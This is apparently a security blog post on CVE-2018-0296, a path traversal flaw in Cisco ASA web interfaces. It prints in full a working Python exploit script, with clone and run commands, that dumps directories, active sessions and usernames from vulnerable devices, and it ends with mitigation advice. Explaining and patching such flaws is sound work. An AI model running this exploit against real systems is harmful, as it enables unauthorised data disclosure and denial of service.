An In-depth Look at the CVE-2018-0296 Vulnerability in Cisco ASA

In the constantly evolving world of cybersecurity, it is crucial to stay updated with the latest vulnerabilities and exploits that could potentially threaten our networks.

One such vulnerability that has grabbed significant attention is CVE-2018-0296, a security flaw affecting the Cisco Adaptive Security Appliance (ASA).

This vulnerability could potentially allow an unauthenticated, remote attacker to cause a denial of service or even gain unauthorized access to sensitive system information.

In this blog post, we will delve deep into understanding what CVE-2018-0296 is, how it can be exploited, and most importantly, how you can safeguard your systems against it.

Understanding and Mitigating CVE-2018-0296

CVE-2018-0296 is a security vulnerability that affects the web interface of the Cisco Adaptive Security Appliance (ASA).

This flaw could potentially allow an unverified, remote attacker to cause an unexpected reload of the affected device, leading to a potential denial of service (DoS) situation.

In some cases, instead of causing a reload, the attacker might be able to obtain sensitive system information without authentication using directory traversal techniques.

The root of this vulnerability lies in the improper input validation of the HTTP URL. An attacker could exploit this flaw by sending a specially crafted HTTP request to the affected device.

This exploit could potentially lead to a DoS situation or unauthenticated disclosure of sensitive information. This vulnerability is applicable to both IPv4 and IPv6 HTTP traffic.

The following Cisco products are affected:

  • 3000 Series Industrial Security Appliance (ISA)
  • ASA 1000V Cloud Firewall
  • ASA 5500 Series Adaptive Security Appliances
  • ASA 5500-X Series Next-Generation Firewalls
  • ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers
  • Adaptive Security Virtual Appliance (ASAv)
  • Firepower 2100 Series Security Appliance
  • Firepower 4100 Series Security Appliance
  • Firepower 9300 ASA Security Module
  • FTD Virtual (FTDv)

These products run on Cisco ASA Software and Cisco Firepower Threat Defense (FTD) Software.

Testing for Vulnerability

A script has been developed to test for this vulnerability. The script can be obtained from a GitHub repository.

The Python Script:

#!/usr/bin/python3

import sys
is_py2 = sys.version[0] == "2"
if is_py2:
    print('[!] Python 2 is dead! Please use Python 3.')
    sys.exit(1)
import requests
from urllib.parse import urlparse, urljoin
import os
import re

requests.packages.urllib3.disable_warnings()
url = sys.argv[1]
regexSess = r"([0-9])\w+'"
regexUser = r"(user:)\w([^']*)"
dir_path = os.path.dirname(os.path.realpath(__file__))
filelist_dir = "+CSCOU+/%2e%2e/+CSCOE+/files/file_list.json?path=/"
CSCOE_dir = "+CSCOU+/%2e%2e/+CSCOE+/files/file_list.json?path=%2bCSCOE%2b"
active_sessions = "+CSCOU+/%2e%2e/+CSCOE+/files/file_list.json?path=/sessions/"
logon = "+CSCOE+/logon.html"

def banner():
    print("""
                Cisco ASA - Path Traversal
                    CVE-2018-0296
        Author: Yassine Aboukir(@yassineaboukir)
        """)

def is_asa(): # Verify target is using Cisco ASA
    try:
        is_cisco_asa = requests.get(urljoin(url,logon), verify=False, allow_redirects=False)
    except:
        print("[!] Couldn't establish connection with the target host.")
        sys.exit(1)

    if "webvpnLang" in is_cisco_asa.cookies:
        pass
    else:
        print("[-] Couldn't confirm it's Cisco ASA. E.g: https://vpn.example.com/+CSCOE+/logon.html\n")
        sys.exit(1)

def extract_info():
    #Extract directory content
    try:
        filelist_r = requests.get(urljoin(url,filelist_dir), verify=False, timeout = 15)
        CSCOE_r = requests.get(urljoin(url,CSCOE_dir), verify=False, timeout = 15)
        active_sessions_r = requests.get(urljoin(url,active_sessions), verify=False, timeout = 15)
        if str(filelist_r.status_code) == "200":
            with open(urlparse(url).hostname + ".txt", "w") as cisco_dump:
                cisco_dump.write("[+] Directory: \n {}\n[+] +CSCEO+ Directory:\n {}\n[+] Active sessions:\n {}\n[+] Active Users:\n".format(filelist_r.text, CSCOE_r.text, active_sessions_r.text))

                #Extract user list
                matches_sess = re.finditer(regexSess, active_sessions_r.text)
                for match_sess in matches_sess:
                    active_users_r = requests.get(urljoin(url, active_sessions + str(match_sess.group().strip("'"))), verify = False, timeout = 15)
                    matches_user = re.finditer(regexUser, active_users_r.text)
                    for match_user in matches_user:
                        cisco_dump.write(match_user.group() + "\n")

            print("[+] Host is vulnerable! The dump was saved to {}".format(dir_path))
        else:
            print("[-] The host doesn't appear to be vulnerable.")
    except:
        print("[-] Connection timed out! Could be on purpose (Timeout set to 15s) to prevent DoS'ing the server, so please run the script one last time to confirm.")
        sys.exit(1)

if __name__ == '__main__':
    banner()
    is_asa()
    extract_info()

Using the Script

To use the script, you first need to clone the repository:

git clone https://github.com/yassineaboukir/CVE-2018-0296.git

Next, run the script using Python 3 as follows:

python3 cisco_asa.py <URL>

If the web server is vulnerable, the script will output the content of the current directory, files in +CSCOE+, active sessions, and valid enumerated usernames into a text file.

Caution

Please be aware that due to the nature of the vulnerability, this exploit could potentially lead to a DoS situation. Therefore, it’s advised to test at your own risk.

Mitigation Strategies

Keeping your network secure against vulnerabilities such as CVE-2018-0296 requires a multifaceted approach.

Here are some recommended steps to help prevent or mitigate this particular vulnerability:

Preventive Measures

One of the most effective ways to prevent this vulnerability is by keeping your software up-to-date. Cisco has released software updates that address this vulnerability. It’s crucial to regularly check for updates and apply them promptly.

Additionally, it’s good practice to restrict the management access to internal IP addresses only. This can be done by implementing access control lists (ACLs) on the network to prevent unauthenticated access to sensitive information.

Regularly conducting security audits and penetration testing can also help identify and address potential vulnerabilities before they can be exploited.

Securing Your Cisco ASA Device

To secure your Cisco ASA device against potential attacks, start by disabling HTTP services if they are not required. If HTTP services are required, use secure methods such as HTTPS. Make sure to change default passwords and use strong, unique passwords for all accounts.

Enable logging and monitoring to detect any unusual activity or potential attacks. Implementing intrusion detection systems (IDS) or intrusion prevention systems (IPS) can also provide an additional layer of security.

Lastly, consider implementing a comprehensive incident response plan so that you are prepared to respond effectively in case an attack does occur.

Remember, while these steps can significantly reduce the risk of a successful attack, no single strategy can guarantee complete security.

Therefore, a layered approach combining several security measures is always the best strategy.

Conclusion

Understanding and addressing vulnerabilities like CVE-2018-0296 is critical for maintaining the security of your network infrastructure.

Regularly checking for such vulnerabilities and applying necessary patches or updates can help you protect your systems from potential attacks.